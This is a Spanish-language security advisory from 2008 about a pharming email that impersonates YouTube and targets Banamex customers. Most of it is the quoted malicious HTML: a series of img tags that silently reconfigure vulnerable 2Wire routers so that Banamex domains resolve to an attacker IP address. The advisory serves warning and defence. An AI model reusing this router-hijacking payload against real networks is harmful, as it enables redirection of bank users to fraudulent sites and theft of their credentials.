Miércoles 16 de Abril de 2008
Ha sido detectado un nuevo ataque de pharming en contra de Banamex. Este llega a través de un correo falso de YouTube que lleva por título "lsanchez te ha enviado un video".
El contenido malicioso está incluído en el código html del correo electrónico, por lo que el usuario puede ser afectado por éste ataque con sólo abrirlo.
Este ataque, como la mayoria de los correos con pharming en contra de Banamex, aprovecha la vulnerabilidad ya conocida en los equipos 2Wire de Telmex.
El correo tiene la siguiente apariencia:
Anexamos el código malicioso contenido:
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.186.62 alt=">
<img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.186.62 alt=">
Qué es el Pharming?
Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio.
Mas información sobre Pharming: http://es.wikipedia.org/wiki/Pharming
| < Anterior | Siguiente > |
|---|